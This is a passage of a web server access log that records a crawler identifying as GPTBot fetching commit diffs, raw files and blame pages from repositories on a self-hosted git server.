"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 16199] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 239329] [Gzip 15.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 57159] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 57170] [Gzip 11.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 239339] [Gzip 15.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 16191] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10465] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10469] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 440366] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:14:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" -[17/Feb/2026:14:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" -[17/Feb/2026:14:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:14:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:14:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:14:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12993] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12997] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:29:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:14:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues/new" -[17/Feb/2026:14:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" [Client 74.7.227.38] [Length 10453] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:14:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=docker-compose.yml" [Client 74.7.227.38] [Length 23776] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:14:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 440340] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 440350] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" -[17/Feb/2026:14:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10856] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" -[17/Feb/2026:14:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=mail_contact.py" [Client 74.7.227.38] [Length 21280] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:14:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10859] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 11495] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" -[17/Feb/2026:14:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 11531] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" -[17/Feb/2026:14:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 17674] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" -[17/Feb/2026:14:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" -[17/Feb/2026:14:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" -[17/Feb/2026:14:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12973] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 